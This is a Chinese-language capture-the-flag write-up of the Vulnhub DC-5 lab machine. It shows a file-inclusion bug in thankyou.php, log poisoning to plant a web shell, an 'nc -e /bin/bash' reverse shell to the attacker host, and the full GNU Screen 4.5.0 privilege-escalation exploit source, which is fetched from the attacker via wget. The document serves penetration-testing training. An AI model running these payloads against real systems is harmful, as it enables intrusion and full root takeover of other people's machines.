Vulnhub-DC5靶机渗透

└─# arp-scan -l | grep 08:00:27:a0192.168.1.101   08:00:27:a0:90:d4       PCS Systemtechnik GmbH└─# nmap -Pn -p- -A 192.168.1.101 -o nmap.txtStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 16:10 CSTNmap scan report for 192.168.1.101Host is up (0.00027s latency).Not shown: 65532 closed tcp ports (reset)PORT      STATE SERVICE VERSION80/tcp    open  http    nginx 1.6.2|_http-server-header: nginx/1.6.2|_http-title: Welcome111/tcp   open  rpcbind 2-4 (RPC #100000)| rpcinfo: |   program version    port/proto  service|   100000  2,3,4        111/tcp   rpcbind|   100000  2,3,4        111/udp   rpcbind|   100000  3,4          111/tcp6  rpcbind|   100000  3,4          111/udp6  rpcbind|   100024  1          38260/tcp   status|   100024  1          43672/tcp6  status|   100024  1          46899/udp6  status|_  100024  1          48339/udp   status38260/tcp open  status  1 (RPC #100024)MAC Address: 08:00:27:A0:90:D4 (Oracle VirtualBox virtual NIC)Device type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopTRACEROUTEHOP RTT     ADDRESS1   0.27 ms 192.168.1.101OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds└─# dirsearch -u http://192.168.1.101 /usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html  from pkg_resources import DistributionNotFound, VersionConflict  _|. _ _  _  _  _ _|_    v0.4.3                                                                                           (_||| _) (/_(_|| (_| )                             Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/Vulnhub/DC5/reports/http_192.168.1.101/_25-02-12_16-14-03.txtTarget: http://192.168.1.101/[16:14:03] Starting:                                                        [16:14:16] 200 -    4KB - /contact.php                                      [16:14:17] 301 -  184B  - /css  ->  http://192.168.1.101/css/               [16:14:19] 200 -    6KB - /faq.php# 扫到footer.php,每次刷新都会变化;刷新在Web主页Contact填写信息后跳转的thankyou.php也会变化，那么大概率是有包含[16:14:20] 200 -   17B  - /footer.php                                       [16:14:21] 301 -  184B  - /images  ->  http://192.168.1.101/images/         [16:14:21] 403 -  570B  - /images/                                          [16:14:38] 200 -  852B  - /thankyou.php                                        Task Completed

尝试bp爆破包含文件的参数，字典用项目paramDict中的burp.txt即可

得到参数为file

先查看一下Nginx的配置，

http://192.168.1.101/thankyou.php?file=/etc/nginx/nginx.conf

开启了访问日志（access_log）和错误日志（error_log）

先看一下错误日志，

http://192.168.1.101/thankyou.php?file=/var/log/nginx/error.log

可以看到记录了referrer头和url

尝试浏览器传马，会发现<>被浏览器转译

使用bp传马

测试可执行

反弹shell

先监听，bp再发包，nc -e /bin/bash 192.168.1.99 8888

└─# nc -lvvp 8888                                                                                                                                                                                     listening on [any] 8888 ...192.168.1.101: inverse host lookup failed: Unknown hostconnect to [192.168.1.99] from (UNKNOWN) [192.168.1.101] 36679whoamiwww-datapython -c 'import pty; pty.spawn("/bin/bash")'www-data@dc-5:~/html$ 提权www-data@dc-5:~/html$ find / -perm -u=s -type f 2>/dev/nullfind / -perm -u=s -type f 2>/dev/null/bin/su/bin/mount/bin/umount/bin/screen-4.5.0/usr/bin/gpasswd/usr/bin/procmail/usr/bin/at/usr/bin/passwd/usr/bin/chfn/usr/bin/newgrp/usr/bin/chsh/usr/lib/openssh/ssh-keysign/usr/lib/dbus-1.0/dbus-daemon-launch-helper/usr/lib/eject/dmcrypt-get-device/usr/sbin/exim4/sbin/mount.nfsexim不能完全得到root权限，用screen作为突破口└─# searchsploit --id screen-------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                                                                      |  EDB-ID-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------GNU Screen 4.5.0 - Local Privilege Escalation                                                                                                                       | 41154└─# searchsploit -p 41154  Exploit: GNU Screen 4.5.0 - Local Privilege Escalation      URL: https://www.exploit-db.com/exploits/41154     Path: /usr/share/exploitdb/exploits/linux/local/41154.sh    Codes: N/A Verified: TrueFile Type: Bourne-Again shell script, ASCII text executable┌──(root㉿kali)-[~]└─# cp /usr/share/exploitdb/exploits/linux/local/41154.sh /root/Vulnhub/DC5/screen.sh     ┌──(root㉿kali)-[~]└─# cd Vulnhub/DC5/           # 开启http服务┌──(root㉿kali)-[~/Vulnhub/DC5]└─# python -m http.server 9999Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...└─# cat screen.sh #!/bin/bash# screenroot.sh# setuid screen v4.5.0 local root exploit# abuses ld.so.preload overwriting to get root.# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html# HACK THE PLANET# ~ infodox (25/1/2017)echo"~ gnu/screenroot ~"echo"[+] First, we create our shell and library..."cat << EOF > /tmp/libhax.c#include <stdio.h>#include <sys/types.h>#include <unistd.h>__attribute__ ((__constructor__))void dropshell(void){    chown("/tmp/rootshell", 0, 0);    chmod("/tmp/rootshell", 04755);    unlink("/etc/ld.so.preload");    printf("[+] done!n");}EOFgcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.crm -f /tmp/libhax.ccat << EOF > /tmp/rootshell.c#include <stdio.h>int main(void){    setuid(0);    setgid(0);    seteuid(0);    setegid(0);    execvp("/bin/sh", NULL, NULL);}EOFgcc -o /tmp/rootshell /tmp/rootshell.crm -f /tmp/rootshell.cecho"[+] Now we create our /etc/ld.so.preload file..."cd /etcumask 000 # becausescreen -D -m -L ld.so.preload echo -ne  "x0a/tmp/libhax.so"# newline neededecho"[+] Triggering..."screen -ls# screen itself is setuid, so.../tmp/rootshell根据文件内容创建文件┌──(root㉿kali)-[~/Vulnhub/DC5]└─# vim libhax.c                                                                                   内容#include <stdio.h>#include <sys/types.h>#include <unistd.h>        __attribute__ ((__constructor__))        void dropshell(void){chown("/tmp/rootshell", 0, 0);chmod("/tmp/rootshell", 04755);unlink("/etc/ld.so.preload");printf("[+] done!n");        }┌──(root㉿kali)-[~/Vulnhub/DC5]└─# vim rootshell.c    内容#include <stdio.h>        int main(void){            setuid(0);            setgid(0);            seteuid(0);            setegid(0);            execvp("/bin/sh", NULL, NULL);        }#  编译┌──(root㉿kali)-[~/Vulnhub/DC5]└─# gcc -fPIC -shared -ldl -o libhax.so libhax.c                                                                                                                                                      libhax.c: In function'dropshell':libhax.c:7:5: warning: implicit declaration of function'chmod' [-Wimplicit-function-declaration]    7 |     chmod("/tmp/rootshell", 04755);      |     ^~~~~┌──(root㉿kali)-[~/Vulnhub/DC5]└─# gcc -o rootshell rootshell.crootshell.c: In function'main':rootshell.c:3:5: warning: implicit declaration of function'setuid' [-Wimplicit-function-declaration]    3 |     setuid(0);      |     ^~~~~~rootshell.c:4:5: warning: implicit declaration of function'setgid' [-Wimplicit-function-declaration]    4 |     setgid(0);      |     ^~~~~~rootshell.c:5:5: warning: implicit declaration of function'seteuid' [-Wimplicit-function-declaration]    5 |     seteuid(0);      |     ^~~~~~~rootshell.c:6:5: warning: implicit declaration of function'setegid' [-Wimplicit-function-declaration]    6 |     setegid(0);      |     ^~~~~~~rootshell.c:7:5: warning: implicit declaration of function'execvp' [-Wimplicit-function-declaration]    7 |     execvp("/bin/sh", NULL, NULL);      |     ^~~~~~rootshell.c:7:5: warning: too many arguments to built-in function'execvp' expecting 2 [-Wbuiltin-declaration-mismatch]┌──(root㉿kali)-[~/Vulnhub/DC5]└─# ls arp-scan.txt  libhax.c  libhax.so  nmap.txt  reports  rootshell  rootshell.c  screen.sh# 删除所有c文件┌──(root㉿kali)-[~/Vulnhub/DC5]└─# rm *.c                                                                                                                                                                                            ┌──(root㉿kali)-[~/Vulnhub/DC5]└─# ls                                                                                                                                                                                                arp-scan.txt  libhax.so  nmap.txt  reports  rootshell  screen.sh┌──(root㉿kali)-[~/Vulnhub/DC5]└─# cat -n screen.sh                                                                                                                                                                                       1  #!/bin/bash     2  # screenroot.sh     3  # setuid screen v4.5.0 local root exploit     4  # abuses ld.so.preload overwriting to get root.     5  # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html     6  # HACK THE PLANET     7  # ~ infodox (25/1/2017)     8  echo"~ gnu/screenroot ~"     9  echo"[+] First, we create our shell and library..."    10  cat << EOF > /tmp/libhax.c    11  #include <stdio.h>    12  #include <sys/types.h>    13  #include <unistd.h>    14  __attribute__ ((__constructor__))    15  void dropshell(void){    16      chown("/tmp/rootshell", 0, 0);    17      chmod("/tmp/rootshell", 04755);    18      unlink("/etc/ld.so.preload");    19      printf("[+] done!n");    20  }    21  EOF    22  gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c    23  rm -f /tmp/libhax.c    24  cat << EOF > /tmp/rootshell.c    25  #include <stdio.h>    26  int main(void){    27      setuid(0);    28      setgid(0);    29      seteuid(0);    30      setegid(0);    31      execvp("/bin/sh", NULL, NULL);    32  }    33  EOF    34  gcc -o /tmp/rootshell /tmp/rootshell.c    35  rm -f /tmp/rootshell.c    36  echo"[+] Now we create our /etc/ld.so.preload file..."    37  cd /etc    38  umask 000 # because    39  screen -D -m -L ld.so.preload echo -ne  "x0a/tmp/libhax.so"# newline needed    40  echo"[+] Triggering..."    41  screen -ls# screen itself is setuid, so...    42  /tmp/rootshell# 删除1-36行内容┌──(root㉿kali)-[~/Vulnhub/DC5]└─# vim screen.sh     内容cd /etcumask 000 # because        screen -D -m -L ld.so.preload echo -ne  "x0a/tmp/libhax.so"# newline neededecho"[+] Triggering..."        screen -ls# screen itself is setuid, so...        /tmp/rootshell下载到/tmp目录www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/screen.shwget http://192.168.1.99:9999/screen.shconverted 'http://192.168.1.99:9999/screen.sh' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/screen.sh' (UTF-8)--2025-02-13 19:44:44--  http://192.168.1.99:9999/screen.shConnecting to 192.168.1.99:9999... connected.HTTP request sent, awaiting response... 200 OKLength: 190 [text/x-sh]Saving to: 'screen.sh'screen.sh           100%[=====================>]     190  --.-KB/s   in 0s     2025-02-13 19:44:44 (44.8 MB/s) - 'screen.sh' saved [190/190]www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/libhax.sowget http://192.168.1.99:9999/libhax.soconverted 'http://192.168.1.99:9999/libhax.so' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/libhax.so' (UTF-8)--2025-02-13 19:45:08--  http://192.168.1.99:9999/libhax.soConnecting to 192.168.1.99:9999... connected.HTTP request sent, awaiting response... 200 OKLength: 15528 (15K) [application/octet-stream]Saving to: 'libhax.so'libhax.so           100%[=====================>]  15.16K  --.-KB/s   in 0.01s  2025-02-13 19:45:08 (1.51 MB/s) - 'libhax.so' saved [15528/15528]www-data@dc-5:/tmp$ wget http://192.168.1.99:9999/rootshellwget http://192.168.1.99:9999/rootshellconverted 'http://192.168.1.99:9999/rootshell' (ANSI_X3.4-1968) -> 'http://192.168.1.99:9999/rootshell' (UTF-8)--2025-02-13 19:45:17--  http://192.168.1.99:9999/rootshellConnecting to 192.168.1.99:9999... connected.HTTP request sent, awaiting response... 200 OKLength: 16168 (16K) [application/octet-stream]Saving to: 'rootshell'rootshell           100%[=====================>]  15.79K  --.-KB/s   in 0s     2025-02-13 19:45:17 (505 MB/s) - 'rootshell' saved [16168/16168]www-data@dc-5:/tmp$ lslslibhax.so  rootshell  screen.sh赋予文件权限并执行www-data@dc-5:/tmp$ chmod 777 screen.shchmod 777 screen.shwww-data@dc-5:/tmp$ ./screen.sh./screen.sh[+] Triggering...' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.[+] done!No Sockets found in /tmp/screens/S-www-data./tmp/rootshell: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by /tmp/rootshell)# 正常流程这里会返回root权限，看报错问题出在版本，问题文件是rootshellwww-data@dc-5:/tmp$ ididuid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@dc-5:/tmp$ wget http://192.168.1.99:8888/rootshell.cwget http://192.168.1.99:8888/rootshell.cconverted 'http://192.168.1.99:8888/rootshell.c' (ANSI_X3.4-1968) -> 'http://192.168.1.99:8888/rootshell.c' (UTF-8)--2025-02-14 11:46:47--  http://192.168.1.99:8888/rootshell.cConnecting to 192.168.1.99:8888... connected.HTTP request sent, awaiting response... 200 OKLength: 135 [text/x-csrc]Saving to: 'rootshell.c'rootshell.c         100%[=====================>]     135  --.-KB/s   in 0s     2025-02-14 11:46:47 (33.0 MB/s) - 'rootshell.c' saved [135/135]www-data@dc-5:/tmp$ gcc -o rootshell rootshell.cgcc -o rootshell rootshell.c# 找不到cc1的位置gcc: error trying to exec'cc1': execvp: No such file or directory# 查找本机中是否有www-data@dc-5:/tmp$ find / -name cc1 2>/dev/nullfind / -name cc1 2>/dev/null/usr/lib/gcc/x86_64-linux-gnu/4.9/cc1# 查看环境变量中是否有gcc的安装路径www-data@dc-5:/tmp$ echo$PATHecho$PATH/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.# 添加临时环境变量www-data@dc-5:/tmp$ export PATH="/usr/lib:$PATH"export PATH="/usr/lib:$PATH"# 很好，编译成功！www-data@dc-5:/tmp$ gcc -o rootshell rootshell.cgcc -o rootshell rootshell.cwww-data@dc-5:/tmp$ lslsrootshell  rootshell.c# 再次尝试www-data@dc-5:/tmp$ ./screen.sh./screen.sh[+] Triggering...' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.[+] done!No Sockets found in /tmp/screens/S-www-data.

# idid# 成功提权root！uid=0(root) gid=0(root) groups=0(root),33(www-data)# find / -name *flag.*find / -name *flag.*/usr/share/man/man3/fegetexceptflag.3.gz/usr/share/man/man3/fesetexceptflag.3.gz/root/thisistheflag.txt# cat /root/thisistheflag.txtcat /root/thisistheflag.txt888b    888 d8b                                                      888      888 888 888 8888b   888 Y8P                                                      888      888 888 888 88888b  888                                                          888      888 888 888 888Y88b 888 888  .d8888b .d88b.       888  888  888  .d88b.  888d888 888  888 888 888 888 888 Y88b888 888 d88P"   d8P  Y8b      888  888  888 d88""88b 888P"   888 .88P 888 888 888 888  Y88888 888 888     88888888      888  888  888 888  888 888     888888K  Y8P Y8P Y8P 888   Y8888 888 Y88b.   Y8b.          Y88b 888 d88P Y88..88P 888     888 "88b  ""   "888    Y888 888  "Y8888P "Y8888        "Y8888888P""Y88P"  888     888  888 888 888 888 Once again, a big thanks to all those whodo these little challenges,and especially all those who give me feedback - again, it's all greatlyappreciated.  :-)I also want to send a big thanks to all those who find the vulnerabilitiesand create the exploits that make these challenges possible.

细致观察测试每一个页面，都可能存在突破口

遇到报错不慌张，细致地慢慢解决

注：鼎星安全有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。